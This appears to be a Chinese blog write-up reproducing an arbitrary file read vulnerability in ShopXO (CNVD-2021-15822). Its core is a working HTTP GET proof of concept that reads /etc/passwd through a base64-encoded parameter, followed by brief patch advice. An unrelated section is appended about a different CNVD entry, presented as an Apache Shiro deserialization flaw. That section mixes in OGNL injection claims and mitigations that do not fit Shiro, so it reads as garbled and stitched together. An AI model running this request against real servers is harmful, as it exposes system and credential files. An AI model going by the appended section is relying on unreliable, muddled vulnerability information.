shopxo 文件读取(CNVD-2021-15822)

本文揭示了开源电商系统ShopXO存在的文件读取漏洞,详细讲解了漏洞环境搭建、复现步骤、抓包分析,并提供官方补丁修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

shopxo 文件读取(CNVD-2021-15822)

漏洞介绍:

ShopXO是一套开源的企业级开源电子商务系统。 ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息

影响范围:

ShopXO版本

环境搭建:

在线环境 地址

漏洞复现:

访问首页

进行burp抓包

 

将要访问的文件进行编码 

构造poc 

GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: vulfocus.fofa.so:40398
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1635834194,1635834251; grafana_session=4ed2fe8aecc214c9bbb634d8399014fb; Hm_lvt_deaeca6802357287fb453f342ce28dda=1640670569; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%2229814a38-17f9-413d-ad48-e704ca23ede6%22; PHPSESSID=jskl7f1mghrjlvsc8d7ctlt4j6; SECKEY_ABVK=dZF+HPOlvzzkwiS3ULsWzkjw4oNoZP3kMhRN02hlMEI%3D; BMAP_SECKEY=a52c397851ec0df6cb484b1d2c453acc49624b58896cb16fca4c15a2a5a330f41d048e40401107e5d699a5592f90abea5c64379815179d8bc02cbfd533f1c2784e84874764b6b40a032b23dbff4e931ed7413db121a2b52266f9290f239991ecce81595bf8b1ec1c3add56d6d7a9d1b87690ec447ec7359de0c799eafbaff605e058b6494a4df2b0d9b55365d4e0a5a8f6b1e541f01e99cd55369bee3dcc7f4a4a21514067b0064068c73d6609ca9562f3eea532cb3189fee339388c1217e1fd5075f080068a7657f15896598309cee7485b7219a70ca86d2017448104c526a28b2c55819909c6bc522a500f62c70c80
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 2


 访问,获得文件内容

 漏洞修复:

根据官方进行下载补丁修复

### CNVD-2021-15528 漏洞详情 CNVD-2021-15528 是针对 Apache Shiro 的反序列化远程代码执行漏洞。此漏洞允许未经身份验证的攻击者发送特制请求来触发 Java 反序列化过程中的代码执行,从而完全控制目标服务器。 #### 影响范围 该漏洞主要影响使用了 Apache Shiro 进行会话管理的应用程序,特别是当应用程序启用了 RememberMe 功能时更为危险。具体受影响版本包括但不限于: - Apache Shiro 1.2.x 至 1.7.x 版本 #### FOFA 查询语句 为了帮助安全研究人员定位可能存在风险的服务实例,提供了如下 FOFA 查询条件: ```plaintext "title="Shiro Session Manager"" ``` #### 漏洞复现环境搭建 要重现这个漏洞,通常需要满足以下几个前提条件: - 应用程序开启了 RememberMe 功能; - 攻击者能够获取到有效的 rememberMe cookie 值; - 存在一个可被利用的对象图导航语言 (OGNL) 表达式注入点[^1]。 ### 安全公告 国家信息安全漏洞共享平台(CNVD)于 2021 年发布了有关此漏洞的通知,并强调其严重性和潜在危害。鉴于该漏洞可能带来的严重影响以及广泛的存在性,强烈建议所有相关方尽快采取行动以减轻风险。 ### 补丁与修复方法 对于存在此类安全隐患的产品和服务提供商而言,最直接有效的方式就是升级至不受影响的新版软件。Apache 官方已经意识到这个问题,在后续发布的版本中解决了这一缺陷。因此推荐的做法是: - 升级到最新的稳定发行版,如 Apache Shiro 1.8 或更高版本。 如果无法立即完成上述操作,则应考虑实施临时缓解措施,比如禁用 RememberMe 功能或将 OGNL 解析器设置为只读模式等策略。 另外,还可以通过配置 Web Application Firewall(WAF) 来阻止可疑流量进入系统内部网络区域,以此作为额外一层防护手段[^2]。 ```bash # 更新依赖库至最新版本 mvn install -U ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值